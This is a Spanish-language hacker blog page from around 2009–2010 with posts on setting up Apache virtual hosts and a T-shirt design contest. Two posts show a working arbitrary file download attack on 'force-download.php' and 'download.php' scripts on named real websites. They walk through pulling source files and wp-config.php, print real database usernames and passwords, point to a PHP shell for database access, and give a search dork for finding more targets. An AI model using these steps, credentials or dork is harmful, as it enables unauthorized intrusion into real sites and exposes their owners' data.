Gothic-X Blog`s

Publicado el 13/01/2010 12:01:00 en Linux. Total de votos: 1  Votar

Bueno me ahorrare la parte de la instalacion ya que aqui esta
http://www.forat.info/2008/08/12/servidor-en-linux-ubuntu-server-manual-completo/
ok, ya tenemos instalado nuestro servidor pero no queremos usar el no-ip que viene en el manual y tenemos nuestro propio dominio
les mostrare muy facil como lo tengo :p,

1.- hacer una cuenta free de DNS en cdmon. ( yo lo uso)
2.-agregar el dominio y te pedira que pongas la ip del server (el tuyo claro esta )
3.- entramos a nuestro server por ssh y nos vamos a cd /etc/apache2/sites-available una vez dentro encontraremos un archivo llamado default
lo abrimos con nano: nano default. y nos arrojara lo siguiente:

ahora agregamos ServerName www.dominio.com abajo de DocumentRoot /var/www/
quedando de la siguiente manera

ahora reiniciamos apache con /etc/init.d/apache2 restart
y ahora ya podran entrar a su servidor con su propio dominio;

si quieren agregar mas dominios solo tienen que copiar todo el desmadrito que trae el archivo default hacia abajo y cambiando :
DocumentRoot y Server Name y listo xDD
se aceptan criticas.

aclaro este texto esta escrito bajo experiencia xD investigando y bla bla bla :p

Comentarios: 3 | Leer comentarios

Publicado el 22/11/2009 12:11:00 en Diosdelared.

Bueno aqui les traigo al ganador del concurso de diseño para las playeras.

Nuestro ganador es el señor ben0x con un total de 27 pts. con el siguiente diseño:





FELICIDADES y gracias a los demas por concursar ahora a mandar hacer las playeras =D benox hablamos por el msn para ponernos de acuerdo, saludos



Gothic-X


Comentarios: 29 | Leer comentarios

Publicado el 29/10/2009 12:10:00 en Bug Report.

Leyendo un post de zeus en ddlr sobre esto me puse a googlear y encontre este script que es vulnerable al path dicluser force-download.php que te deja bajar hasta los chescos del server.

simplemente tenemos la web:

http://www.xxx.xx.xx/force-download.php?file=archivo.pdf
cambiamos el archivo.pdf por "force-download.php" para comprobar que es vulnerable. si te da a descargar proseguimos a bajar el index.php

http://www.xxx.xx.xx/force-download.php?file=index.php y sacaremos muchos mas datos. como el config.php entre otros
para prueba un boton:

http://www.expo2010chile.cl/force-download.php?file=force-download.php juaz baja,
http://www.expo2010chile.cl/force-download.php?file=index.php era de esperarce Grin
en este caso sacamos esto:
Código:

/** Loads the WordPress Environment and Template */
require('./wp2/wp-blog-header.php')

http://www.expo2010chile.cl/force-download.php?file=./wp2/wp-blog-header.php
de este:
Código:

require_once( dirname(__FILE__) . '/wp-load.php' );


http://www.expo2010chile.cl/force-download.php?file=./wp2/wp-load.php

Código:

/** The config file resides in ABSPATH */
require_once( ABSPATH . 'wp-config.php' );


// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'wp2_expo2010chile');

/** MySQL database username */
define('DB_USER', 'wp2_eXpoCh1le');

/** MySQL database password */
define('DB_PASSWORD', 'wUyUBaTEphac8UG');

/** MySQL hostname */
define('DB_HOST', 'localhost');

y simplemente desde una php-shellentramos por el SQL y entramos directo a la db =D
happy hacking

dork: "allinurl: "force-download.php?file= .pdf""

Comentarios: 5 | Leer comentarios

Publicado el 29/10/2009 12:10:00 en Hacking Web. Total de votos: 2  Votar

Bueno leyendo el post de Zeus me anime a probarlo y aqui hay unos buenas resultados..

http://www.type.co.uk/download.php?file=index.php
misma url path diferente:
include_once(APPROOT . "etc/functions.inc.php");

DetectSkin();
goWWW();

include_once(APPROOT . "classes/dUnzip2.class.php");
include_once(APPROOT . "classes/class_ttf.class.php");

include_once(APPROOT . "etc/config.loader.php");
include_once(APPROOT . "etc/database.loader.php");
include_once(APPROOT . "etc/dbconfig.loader.php");
include_once(APPROOT . "classes/format.class.php");
include_once(APPROOT . "classes/user.class.php");
include_once(APPROOT . "classes/mail.class.php");
include_once(APPROOT . "classes/dates.class.php");
include_once(APPROOT . "classes/supplier.class.php");
include_once(APPROOT . "classes/product.class.php");
include_once(APPROOT . "classes/family.class.php");
include_once(APPROOT . "classes/account.class.php");
include_once(APPROOT . "classes/content.class.php");
include_once(APPROOT . "classes/display.class.php");
include_once(APPROOT . "classes/wiki.class.php");
include_once(APPROOT . "classes/shop.class.php");
include_once(APPROOT . "classes/payment.class.php");
##############################################################

http://www.explora.com/force-download.php?file=index.php
misma operacion:
./wp/wp-blog-header.php
y aqui el config ./wp/wp-config.php y sacamos los datos de la db:
// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'explora_wp2009');

/** MySQL database username */
define('DB_USER', 'explora_wpadmin');

/** MySQL database password */
define('DB_PASSWORD', 'dLrtNYDS7hqF');

/** MySQL hostname */
define('DB_HOST', 'localhost');

##############################################################

www.rhodesbishopsstortford.org.uk/download.php?file=index.php
misma operacion dejammos el file= y seguimos buscando:
require_once("lib/hbanner.php");
require_once("lib/News.php");
require_once("lib/museum.php");
require_once("lib/newsletter.php");

##############################################################

http://www.duckworthboats.com/go-download.php?file=index.php
<?php require_once("includes/head.meta.php"); ?>
<?php require_once("includes/head.php"); ?>
##############################################################



Comentarios: 4 | Leer comentarios

Publicado el 25/10/2009 12:10:00 en Diosdelared.

Bueno ando aburrido así que me anime hacer este concurso, de diseño grafico para mandar hacer 1 docena de playeras. El ganador se le enviaran 3 camisas, en color gris talla M
las bases son:
Tema: Under, DDLR, Informática
pueden usar 4 colores distintos en el diseño
tamaño: carta con 2.5 cm de margen
y echen a volar su imaginación,
los jueces serán claro si aceptan:
MurdeR
Kaos
Alverid
Zer0 ZoOg
y yo.
los participantes manden mp y se hará la lista aquí mismo y al exponer las imágenes editare este post. O se abre otro es lo de menos, se dejara de recibir participantes el día miércoles
28 y los diseños se dejaran de recibir el día lunes 2,
a se me olvidaba, solo México, si quieren concursar de fuera adelante pero si llegan a ganar el paquete será enviado 1 mes después =D, por economía baja haha xDD, espero participen y apoyen.

Edit by MurdeR: Movido a noticias.
Edit by Gothic-X:
(28 octubre) Nota:
El plazo para entregar los diseños se ha extendido el plazo para entregar los trabajos es para el 15 de noviembre para que alcancen a terminar sus diseños

los que gusten entrar porfavor leer este post:
http://alverid.diosdelared.com/?coment=3737


Comentarios: 36 | Leer comentarios

Ver: Siguientes 5